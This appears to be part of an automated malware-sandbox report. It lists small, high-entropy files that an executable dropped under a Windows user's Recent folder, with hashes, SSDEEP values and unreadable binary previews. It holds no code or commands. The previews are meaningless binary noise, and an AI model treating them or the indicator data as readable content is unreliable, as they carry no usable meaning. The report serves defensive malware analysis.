                                                                                                                                                  Preview:MQAWX8v..(...,......"...._UB.i\..........>..x..P;..2.7...dC.....}|....$4.....:...6~.C......?\..|.f..+....y...f..Z..T.Q(.-i..g....:..:.%..`.V....K....$.@...X....1..D16s......Q.b..7.>......{P.a....F*tK...I...J.{n.}n).@..O=...U....,.......C..H.>.\.B...........z.bHW?..G.E/.R.B.M..........I...+.K.?.R..{.mt......Is}Nf..2.;.].H=...Oz..kj.dn./..4.....D$..-c.t..;.T9:5.*....L wq....!).r......=|X.a{N.....D.*;>..k{8p.{...&U...oU...0Br.q.;.p.sf?#..pIV...[...k.jw......f.Y.2....8.9.k.......Sny....sVk..NYt....g....,..d .;.4...l\..?.......A..}T.+.......S.Ci$....8.v....^.........d.n%X$.ra.N..B...`...#.?bA.@['..b.<..&......u.L..P..2 .7r.Z...O..p.-(...zW|..Y..ox.^<U.;6...'..yc..+..$..:...+.Ff.b.z.LG.ou. ......b.j7.X..u.,3G&f=.E.1.Md.d...g.'y..F#..%..U..rJ.X.:...{...W.SeS..<.......r..9nD..[...{....qlF..!.]....h;...$....7..W}'7..S.O2..._.....].Z...q...[n;.../.K......M50#"N.p.P.f>...9...kTG................z!<..4.9.^.e?p.:W.*.V.."zg.....Q..FiE![..o^.az.q

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MQAWXUYAIK.xlsx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.87025139304484
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:pf6KpbD0JJOLg7H4ft5aaKtTbBpYPSSG+9qN6cxYnt7t2bD:pf/pXlgDsiDySSjUN6cQiD
                                                                                                                                                  MD5:D4B5CBDA3F54F9315536A82381CFEDCC
                                                                                                                                                  SHA1:7B43251C4CDB116B828113EC6ED3C735C8FBD8AC
                                                                                                                                                  SHA-256:98ACE78B4489135091685FAC48F9EF6CCA5ABC5F83D28652EC568C55819316FE
                                                                                                                                                  SHA-512:6BD689949B9A6AD61650137BF09229539B7230C99E17705380E44020697795C132DC61516C8E0E2E9FFED59A15CCD9544746276CE0CBF1D5EA0A0D56D440D19D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:MQAWXT..z.#.f..-B\..~[...-......S......qt. .......:kb....S....f....wbPh..(.....g...3.......J..........?..wv[..OgY-.p9S.x1Xx..../.@..M.nZ....C{.n....n.(.....Y.7....%t.[.....k.c..'0d.R.@..o..9t...:.N.5...1.]......-...Gv.xx....n..HG|.oi....d0....8.f..a.JK.*...@/....h!...F!...q.1........ ..xV.QV.g..j.....n.i..ygz.....F-^u.g.....,..Jkxd.Z.`.f........0.k...=`....@.r/...A.... {!.dS..?|./5.M.f4(9.._>Q.F.|..#&a[bv........1....vN.';..d......T..G.5.6..l.'...X&..z.B.XU..Fv.......vW.....3....*.!.@....v...&W...d.....8....Z,..d.ND.C....B}js..../.{..Q4.>L..G2..cb.=.$.E[U*......<4.sw]..\i=......`.KG=i.`.o..r....7.6.(.sY.....FI...>..3..G?&%.......>.$m...r.S(...h.-^N.wK-.d.J..\~P..*O......?..l.o.{...Hk...q...q...l.P{..?K<.c.J..Ew..d.g.b.._e...s...B.1.Z..zP..'..+M.T..&...}....-=$..) yH..7f.Z.......O.....Q....3.]S..u..f...m........2.:.}.F..4.JFG.(U..b..$t...._..UA.L6sg........k.;...Q..#...}.r=..pL...k*@ku...A.4e.p..$...!.U..Gg..$?.C........)z5.?..{.WPZ

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ONBQCLYSPU.docx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.80657569399168
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:mgUAdlp4HYM98Yai3fZ8Wa8JihjYDURol9q9IIpT25QEbsgYCr2sMfmkfMs8aZ2X:mFov4Hz8Yai3fZ8WaJxYD1nW4GEtYg2E
                                                                                                                                                  MD5:56DA7FBBF1DEDD13720FE34BA9CD62CF
                                                                                                                                                  SHA1:58D6651A7CBB35B4DF4D305F60AFC666D6A880AD
                                                                                                                                                  SHA-256:194D4326E42924F9FD6D86C682E52F2F994E3F2F4A2D317B59C810E2CC35B066
                                                                                                                                                  SHA-512:91813391365FBB4E90EEC610F5BA7A0190D54EC438F63B8C6BE4230D06C71E4970E58FF1BB18F11CA4BC2AE5D93B2EA0A46A233805FB3687A223A794F2295929
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:ONBQC.<...`.'.;.a(".5m...l.PCS...\b.V..B...t,*..$...L,.{.c.JQ.=.C.9.zQ.=3.@...P.$..u.:d..<B.5I../$.0.._....z.(.,\..-V.!G`....S.....M..[R_B.t.......6.{..3..E..........~......b@x.."..`.lN.z.S..."xZGc...c..}.}.......t)5.^.6....$#......{?kB..J...|..qDJ.4Z.%.1.....uca...z|.!.-...?IM.._c&..').e.h.....C.v.k...GuR..K9.."#.."..?g..=.@.k...gB....U.dl"R(vN..5.....T.-m....'<Agd..%...N..VkV...N.JY.~]"u..-h9.....p...Nr>..U.$S.Y..(S.>.#ly..7..-4.Q&{..#.}........Y$!.o@2.......[@C..@....l...Y...2kdZ..m..J..L.\*.S......w.h*....f^g.Y....2....D.j.l...-..%...E.....<.)..R."....D1J.........f...P..|... ......e.t..B...U.....r=.J+.W.u. ..@Q.xO.GE.B....6.G...X.N.......*ST.9'.<*.CZ.....C.I8.~#..g.^.+.\..trb.pL...&...?..i...(..*..)Z........Z..~.B.......g.$KY.....CW....G.=.B.`..m..$.h!Ud]..y.+..y..2'~....."........B.j...7..a.<...cd..=@0$.......8.......@....t...w..E.........l).C..h.3.\~+.SY........t.q;#4.H.e..X..Y4}j+.`..P-.J.B.*G.-..k.6YR.r.1..........Y..}...djG9C.....

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ONBQCLYSPU.mp3

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.862896559032469
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qMdbvr636OvOjm+rk8a/mu5Y+/DyslhG9s03Y/jHKYG9rdgg0F1d2bD:l9vR4R+E/mu5nW/9s0WLG1ZD
                                                                                                                                                  MD5:1B0880D441984745DB6A99610D024000
                                                                                                                                                  SHA1:C13D742B49ACA19C711680DEFAA135EDB1F96D75
                                                                                                                                                  SHA-256:D7B0A4C0874D77244EFB380AED9A3E94DE3949B3B971C018329C0B742250C16B
                                                                                                                                                  SHA-512:A4F3B7E88501D6B4868496799BA76C719A05F2F21153EF5052BD6327FEE1C9AEC3A44F863E4FB007722D8DD0CC812F927C28E820EDF90F3F3C18BA8AE1099E61
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:ONBQC.4..=.o...L+4f..}V..WDL...B..V.O.......+......P..}t8......dfC=F.y..G{.{}...w....7.>......lt....0I|..%.O..W.q\.....hWB.nR.|I...0.>.J(.=.$X.....Sx..+...}.YFpRq..g~s...}.U.x..d3F..A..*8.Ja.#......Y....Z3......YQ.?.E...2.:.J.u.e.;..Kk.x......H.).|q&h.t.&...=Gy)...SnYa........7v.E..3.|.......<v6;..|.[.-....h.d~j.........7.N..w.Z..J......k._.M.t.h.e2..3.R....q...A<.Q..=gA.._..9..J....C..z.Mn....z...E.m.|....3.'.6..$..i.x..i....o...........).......%xf.#[....X......W.....{.u1.". . ...RE.iU..x..)....eFL.KC..u,H.2..+.>.<.A".y.v..~9p.tUY>.6....R....&.....wn..L.u.x...$.jH .....8..hU..~Z.X.2....+...&..BVY....H....5.q.......`.....B(=.H.M.my....@n...;..sj..J...zj.........)..T....s[.Y.u..2..e.B..T.....:.]va.......D......._1.....[Kz...Z.1?@..C#t..m.?.S7_.Z[sA...&..H.f^..Rz.{..]m..N..3.A......RX....[.=..+....`..b.lj...MOU.3ni.+.q.......y#....4.+C...r>..g.u..S..jq.c.J3.m|q....U......=..$.......B.f.C..g.`..;.........Hkw.Kx....9{...X....Q<q ...@......

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ONBQCLYSPU.xlsx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.856709065274824
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:39i2EQw0OxOcdJmIA9rlHXKIpfjdQ0fKnonslP5Vc6y53psnyGQANNClubNHlhxw:Pxw0sL/YBHXKI9m0f5nsNzc6y5ZMso5A
                                                                                                                                                  MD5:486CD6ED635EAC7762DCBC0B1CAC815F
                                                                                                                                                  SHA1:A4740E2E553E6A33E8D031E35B9E991C5A153ABF
                                                                                                                                                  SHA-256:A9D53EADF89822BBE663BDDE3C43DED1055B1FA1B36B0B7E168B582090173340
                                                                                                                                                  SHA-512:5787294A8483D641A685C41866608AE19055D392426477D7A3FF8052E1F2740323004470268E473CB26B65561B95DDDABDF0ED5921EA0D5FA42EE2C2D0FCEFEE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:ONBQC%.....m.C.b.a-..x..o.L.n.&.(...L.>...\(n..,.Th.w....Z.Xk....c.C..T...^...4B....:.J|..9_m'fdZg\M7^:.?.*.........t....1s!.~_Ic:...,.L..y.M.MHD..M8?F.U.....q.o.*.....~..|.7.l{.z. .....MK...G.pA..,n......u....q. .....q<.."..o.....Q..e....J..c.T.....>.a.(..YL.....m.....(f.:o.T.........M.&...N)m...CdTgl/PS..i.$.M.;.{.S-..^J=. ...t_...~.p.r.,..................JL'%..c.T......ER..../.V..s0...$-.va$n.].?]...>.._.d5...0.....0.......q.4.N.......*.4.._{+>!...T......o.......N...y.e...~.=<.m.y.....rC.|r.W:2.....yjZ..x.`f|.U..K.....:....8}tRN)y<JP^9...|i..5xrx.<X....Cv....W3.M..O.....q..Q.....b@.TN^u.^....._..N:W".J..3....U....l}!n....D.h.f{x...V.....P.z.OC.r.g"~.R...n......A8").?...xi.....RS.....4...(.....[....*.5 @Zk.{.w.u...u.......x..(.^.zMf.wB..H..:.;..POc....AIg..9....X.............c.6..).+...V.....C...G..d5....... .. .{Y...x.#(.....!. ,..y..J.oq..Bv[.E..>.Q.Z*P .....s...n=.!d.....#....3...qCF....O.h.:>..f.n....s....>.x.....-.,L.`...9.z...

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PSAMNLJHZW.docx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:PSA archive data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.866371904345975
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:vg3plgJHiQ4/NHpOGXVp3PdykjhkKZF5FXwbomn+aQk2bD:vOgJCQmjjvta+j3D
                                                                                                                                                  MD5:34DD90952F06CAB05F447F68E2A314DE
                                                                                                                                                  SHA1:734A38AE94352E88FCC0391F16BFC1BA4130219C
                                                                                                                                                  SHA-256:CE17673CFE37A8F4EAF639E301D5B1781E49135BBFA998D5FC098CE6BB23A5AF
                                                                                                                                                  SHA-512:34AAAAC9647DBF60BCEAF4DE4B82ABB18E22029B156A600B106BC7D3300AA84507FE85E779CE08110AE7E5D3C98F7898905DD08B6D52C3ED2F2BC1E65D713DB5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:PSAMN...o.:iZ...).F..m..['NN..2.^c.Jo.."...e.yQ.4.^.^K..\...2..'..7Haa.)(.C.`.p.%.F6H.MCH.....L....'...T.Q."....`.X.b.e. [..R9.9R..l......9...H..OR...7.p.}53.N.&.... ...f..4.?.3f.;N....R.:..g..t........`V.L.Y.....C...A...Q.esYx........X.}.u..iY).>2=.........6...5+.h...v.....d.j...<...$d...p..z.]ie\......#.+.A.:Mp..[.$.7.>..........1.*...O.....5..).2H.4....1N...b.*...Ae.r&#..P...K.N@..........W..I4l.tS..l:.....:.....4.].0.5Z.;....l..q.....w]M.r.k.....N.v^.p74$/.<..Y>.>.5./...0'..L.=..k#..Q..W)..%..&.X..M..V.I.W..H`<.#h.%......c.|fHs....._+........{.Z..&..]".D.....}D.>E.W...p.t>.^..!.t.fj.&.=Z.u...'..Z.`g...Z..W.`%........&:NQ{..OE....;o(..:x../=...Eh.c..*.....n..7..o......Q...Zc....O.|...T...nd....._~.P.....*>....?.....z1x.G.e.|..N..,..c..\3.}....X.OX..Z....b6.....#.}z$.pT....;.JYP...B......P.F,m+....8.Ya#.Y..f.b./'..V..O.I.O.[.t.s....\u..t/\....Z.3t....=.7P.r.m\1..T(}.'..R.M..hq(V....[....6...s..,....`&..1....Pi.$../......|G...T.Ew..3

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PSAMNLJHZW.pdf

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:PSA archive data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.854175157050005
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:QIIqROxSpVa9Jioppm+pPp0js3f2D4wwF6bJsaRtbWp//OX/wxUrZ2bD:QjqKSpVa/i+pPPuD4wwITb81xhD
                                                                                                                                                  MD5:C9AFAE8F3EE3B9757626CA8C2BA4D7B8
                                                                                                                                                  SHA1:89860B4C0328258E2227F9561345FB4E8CE13EA5
                                                                                                                                                  SHA-256:AD1F044F39310CD3B948C5BD2DABCF8CC48C6C43F54556E83EFCBE0324F48020
                                                                                                                                                  SHA-512:389D87ABE2BB26D5E82E5D92C884EF283E3DD689CC754952B165BCD2515C3B664477530121359ABFBE6B18D57BCA97AC965709B8A52027D0D4F8C968A2F993BF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:PSAMNU...;S.c../.......!......g7..S&O...?v.j.....].....u)...Q.".uZ.jA0x..,Z]+......r.. .......m..>..J..7..-s.i.&/.0.y."D{p.. .......|........b.....,..y.A....:fI....]}_...g6......[j3#.Nc..9...."'{...m...b;...5..[..Z..fxu.`FM.S.d)8.I*..f...gOe`z._....!.d.... .X...-..n...P..@..1.r.4.Lw..{B....D....s..s.gG%.,g..v.P....z...).G4(X.....hy.s...Q..F...../..........,..g...V.N+...2...0J.#.mO.e\{.V.&...W8u..KC...Nr.>P(..r.NX.....t..].....t.....G.H.0..[,...s..uHj\`../2n..^,..~..Ji....\.........o...D..N.?Mr3k.j3...o...k..WU..0..J.[.3:VSf.=..v..)[.....Q:$f.'.Ke.Ba'....m....f.B..OM..8..sg.v9..v..P..?H.I..f.<5..-)R@...l.L.\+..^.&F@..eEx...R!R0\../P..V.,...K.o...?..\..=a.....Zy....3......{E.w.!..rk..>/.;n.f.........v....E........R.....)=..1.[...&.......Esf.....y\....%.L#.Ox.r..s?F...~g.y....#.....6.N.t......+.QoQ...o.\.:*ZW..<.....c..&+...z.i]v....).*.M..JfjXrL...).H.s;0R.%..Z.F.v...?..sw.|.!:L.Cr..:)..jQ...K..GCP.P.`.W....'..B.c.S...f..x..29#..t"Mf.9...

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PWZOQIFCAN.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.846113063904367
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:5iOU3UPUmWR7hUwXIzgEJiygicxS/cIO7L6smiTfspqXsqJDTIIna2bD:9U3UPiVjUgEJ7cxucr+wCqXFJYIRD
                                                                                                                                                  MD5:3E750901740864B2FF9488A0EDE2ABB0
                                                                                                                                                  SHA1:E9CD6892002BE65FBC1B3BB98AEE95D03FB66AC9
                                                                                                                                                  SHA-256:3D90AD4D7C336B2DCA87761F37BDD055B17B56CF3FF32CB693BB09C959080779
                                                                                                                                                  SHA-512:0D3063EB22A70847C981AF4501AC187190165A8FE022BE87C120CEA144E35BFCF5FC135655121295DFB72306DE1F852578E4D544A239DCDE73FC74731C4FBABE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:PWZOQ.(....f.2C.m...X.+...os.q~....c.!..O..b.h.fe...@.......a..<<.}..@u..e...P67}...F....../..2...'.)+(\..'...........0........8......P.L"!...M..~.RW_$.E.D..IS........o9..*......}w.....*.ck.laW...?....}..o.\.W.7S...........V...=.W..k...3V..\y.raE......v....D...JA3m..`.q e'}...........gp.3~..M....{.Wd..L..#.....s.Ap.6~O.5.}9.p..$..-F..\.....h..;.......EK.w..\..6s.U......./.$h.@.x....@'.Z@..?...$._9.$[..X0k_.W0..T......=.........w......<Ng.s....V....}......Q.O...,u~*i....C:.....G........1.k...*.....7.H......<..n..i....7.U..D ....J..U.gg[..n...7:..l.0=n...W..!..]..nu0.;.\L....u.o..5..v...4...l...2.@6.Kj.&Z.L!...J1.h._...k9..^A.z(....%.[.....C~X..."...V..U~E|Is.+)..g..;.....=1.F.M...g....<..b......@.Y.>^..C... "....6.z.ZU...xP&.]\..H.2.W......0.U...I..71. ..y..~y..EN.B?.[....!....=.E..f..@'..U..W`.......:.".Y.)jcS.v.;.\......\.\.6........yu.k!..k.S.{..;.v..~.&`.f.k..oO.[;.$|..Y......d`..\...u.-.....g.....E..)x.F!.:%.m.a(.G_..."2.

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QVTVNIBKSD.jpg

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.846347844251049
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:xM8JSi6UMYP0Ha8jvPyKQW0QHM5gcRF2n2ScyOgOYsBx4RwGUcnBCSE2bD:xMSEYP0HjjXyKQXgcyn28+YeCxUcnBCI
                                                                                                                                                  MD5:921B85260B3911AF01616DBC4C5F434F
                                                                                                                                                  SHA1:4019A6D61C0BC78AC4EE38B66EC1C57626A9CAEC
                                                                                                                                                  SHA-256:4F23F841C49465B9B230790EA7E35765E84D3DFF6FC60818E2C882E3E9EF280B
                                                                                                                                                  SHA-512:DEEFDA5A9AC3982AC160B9B8B7C148E540ACD499AA05610D9A39953723C2A31359A2F1C7E60B0684A675EAFE10A823478C5A57B17322206CEDE41CB44EA898E3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:QVTVN.......d......oJ8..o.X...i..c(..X...@.f...>..1..M..D..'.8S.Rupz....[...-......y.Si.x...lo>.n....D..=i...z...'cwL.Pj.%.nc...z.t...6).|..5P... Y2K.y..."......GD.5Q......2.f3e.|Y\..Z....@........iB..&....B4.%...F%5.G...<|b....)..A-:h.q5..~SZq....?x......-R...T....i...~.%.8..g........d..Gb..N..UX.FQ.....!H..0.......E.....x..aAP.......h7..R...s..4 ..z[vM.q3..^(..i....}....."9.T...H....9.N.k......d.+/s'.[..b7...s...e.%.Z.X.......f..J.xS........0.m.z.*<..Q....&lYC.EV.E......_f...`..4..6.,...v3..!......|.7h.il.......g...P...N|:v>P.3......S..r..<`._.......nk6x...`p5/.....6..._z.NSV.21.T.a..^.*.....?....x...hT...8....3LF.....H...*.@%....k......6y...g\.P{.O...PN.*.[.G..g..c...)..-&....L..e..QH.=.>..`..'.~?n0..J3.b.......:F7.i...h...P..|y..6...?....Jm..c.J...j..N..)...`9.n&..+..#.9U[.....E..u=.....}..T....G<.k....."T.c.m..b./..[N?..nG...j}...;....Y.X(}.n...b.7.2i...2...1.O..t..f.t..F.......>.u,.a..;pr........k.(0G.a.....BF0!P.2..W.YM..S..R:HI

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QVTVNIBKSD.xlsx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.866848145829771
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:OKxKP0i5WX+zwD9n8A4MpSQbLGhX+50VrNeb/4opjlT+juc3/cwZ2ForlYlL6o2X:TAWOzw5nNLWB80FNe74oxlT8lvcwZ2pu
                                                                                                                                                  MD5:E01D5FF115E1917C432C0031AB13CC17
                                                                                                                                                  SHA1:0FE047661F3298B67C0BCC10740654F9542D7D30
                                                                                                                                                  SHA-256:8A8E5E87D16EB0B5A8A55F50BDCBD403D6815333A066847BE6BAA347C0D97D3F
                                                                                                                                                  SHA-512:8E111C1317C326CEC4C7AF5FB6FEAA3391A4F272BDF08131598C1E563E123C1744D1B60CECD61A8428C1A0C2DA55C6DB8B55127A5A843544FB450A931AADAD99
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:QVTVN..>.. ..lHN}.o\....yBi-x....Z7?.r.G.,u.R.......9..d.......w..NH..X.VcI0....W..>..-..Je.[..T.c .l....Wq.\L..'K3.v..P.....\Zu?...........W..C......O......./P".......n9...S.t.....S".r..=.1w..L,U.N_.H[tu.a*.+p3.9.t.|..PX.C..........s..k..6..^;.t;M..<.....]0Mh.,9.y...W.+...z.K.T...B..VM.y.V....8..5.'.J.....Q#..2....L..........e..U.kjG@.@.u.L.....t!.2...F..l....l\-...S..eI4..e..:...V....O:.s.4.n\...........n.k^.9.L....{.T....j..Y.e.(...(.\..1V.*....W...N......i.0.......<.R8&6~....Pb^.....E-t...3..a...J..'.|....l..vE.Bp&...y...hst..<.u..~8./.9"C...u...u..q..m'T.>....i..I7b.X..|...t....V...G.j%.u.p..+..6(.).n.K*....._.....|AML......i..:...%.Z~u.e..n..?xY.8....h.(B..2..C.......1p3..z.*L.+h..Z...@..&,..f..5.lp......^.S.\}q...)..o...C..t.^.?.....c.],p......MP....07E..n....30....Q....XdV.p&@.,......_...t.x.....G....J=$..a&..N.....>.O[|RC.e.#..--...s........xb1....]4...........;.I.,<..d...:%......CC"C.7...H....TA....^[~g......v6;../Gu8 ?.

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SQSJKEBWDT.mp3

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.86137494693689
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:UO0zEPe4cjFzHRuh/QVWUR4EVkje2LzADaFuJFTZq9sh+L2bD:UANa5GckjFLzADIunEezD
                                                                                                                                                  MD5:81C9B54F64B659CB5AC70253BD10526A
                                                                                                                                                  SHA1:12F3963D77A0A35F62FB07C09A6876A279789A9E
                                                                                                                                                  SHA-256:0B0E5EEE69225F1E192DA63EE84539B0CA8E5EB506794D4356C2BB2EEB02938D
                                                                                                                                                  SHA-512:73D033A4B0950094AA0BBDEFA91D94CDAAF39E4EFF91215B53966C77406554173759C34D590903DFB12D443E49DBB6825275AAEACD39603B846C45ECA8187088
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQSJK.6...W....R|.Om-NC4..B....tR...O.q.C+.Q..].M=!~.*......@.....5.J.I....M .....a...^B.....`.L.G,.m.P.........(4..L.ON....... v....ujR.f.....r....w.2.l?@Z.')..f...+....Y.1.n.6.{......`^.,....Q......3......k.L......(...-.F...J).F(Mc......s..d....>bi.. ... .Gh..ja^.T.5?.........%.^s..w.&...r...@......K....u!.....7qn...Y<5......U.<.(.7...%D.......58.s[.....<.......n!..y.x.Z.f..b..W..=]1P3@.c.....H~/...7....C.."7..0%zi.....q...rJ..]...../..Q.Y..u.b....D8..Z.S..........E..B.I_V3.?q.s~.T.4.\...+..-..=.....2...J4I,..T..oq...jyY.VRq.n..........p......p{......J..a..O.@.#.../.A?(o..L.P..Z.Vy. @b........C...\...../...l.p..V/@......S..Y..}..ePu3...x..HL#...o....N.<........U..j...'.s....M.:u....[.(.i\.E.?.V0{g]fHX3....#.....i.6>.."....*.#.W..^(.,4W.............l......K-.H.;.R.*i..1.b^..R.)..=...LC...W....s....m.{O...e...d=.......d%..../..~7."...2#.x.K:.cd...L....ce...g.......6Js=....n........#..N...F.b..iS..a...J_G.^....k...\../&..

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SQSJKEBWDT.pdf

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.856037933602533
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:6VPuTEgh4qh06M0eIOWlzqRuLTh+DFmuIVYQrq53zK44tFHqo4waS2bD:sPuTEgh4qhd9eIsgXrutIq53zKtxn7aB
                                                                                                                                                  MD5:B994039C64315119B112E9AB98B66BA4
                                                                                                                                                  SHA1:B6325A41EE2DD5AE1E0DAD998F1EC64F0B018413
                                                                                                                                                  SHA-256:AE3073F469B41DC9DDB26BECA9068AF9D83FEE79D5EC7403A5A98FE83223F54F
                                                                                                                                                  SHA-512:62B6F849A8614F456B333EC8F7CC8C8A6C917E0D4474772768C1FA3D0F729C7A08A08D13F1D5174577466D078847193921F98CCB94D3FF3261FF3573C1737E2C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQSJK .%)J......kyG...'...........(.HBj...N...a..R.N-....R.8.s1.J........=.....B..u-;@....}..E/R.j.....o..#.,t.F.Iw.../h....+..-'lQyI. ...?(...1u..c]9>[...U........9/y.9U...^.......;c..L.X.^@..&.x..f....kMx...a<.^"...WJw....._9V...'I...h..X..%..&...y.N.t.GR.NR...9...;.G....G...{...j....!..X..%.=....'.w...F..D2uTb....-...g-/e5..N.5.....|f.... `...Z1:....{.......x.=...'.&..8....N....e......p..Cl.....4K.c.5.>. ........R.&.|.....6..r.......y..w..X.M.3.d..rSI...AD$...Q.-...&x$}..D.^.~....UV&..f.......\V..l........`b'..N..S..j.j...|.*U....u...B...c.A._Z..m...M..7.g....q..Oi.~4.....J.+?./#....j.4..2.Y...F.U...R~...>+._x.3..?...=.PP.....3.g.....1.1.H... yp.h.."..,{.....D..1....:....@3$..=.......[.L>..@`.8.X.Z.c...l.5...Z..{....*..P..=....`.Oi.j..2..k..K.N......./."Tr...cQ.i....s..3...w.....8.s......r".,F..B.......M.F..1...v../..>HC....B.$..D.7...5]...3....V..D,lo.;p.{k...|.....t<"......./.|.+......x...;7..t..t....q..}.l.."..... ..'n.L....B5*.K.....&9.

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SQSJKEBWDT.xlsx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.851195501556457
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:nzLs0BGI+gVwVdGWiCVyeeurMvJnfWdMMWZV59nHA7BvoXGSTEpWPD3Igw3Y2bD:zJBZqVdliCVyeeuAvJcMMq59gVwXGSI3
                                                                                                                                                  MD5:2B2E5DEDF0CDDF7EEBEF5202CA25F3D2
                                                                                                                                                  SHA1:6DFF8A7939E4D67C29C2FCE6E46265B41EAA399A
                                                                                                                                                  SHA-256:0B7EBE30FA3CC1104921B3C2FDFDBC1B1D1686A7A66BF5333AF5DF409033E204
                                                                                                                                                  SHA-512:11AEA5302137D1DEE7EE93CA81889BC85EC6F2FB6F6BBD42EE498629F474B87EE5D1A2B78BC672B1978A47752859DAB0873682087ED20630498354E3F8114695
                                                                                                                                                  Malicious:false
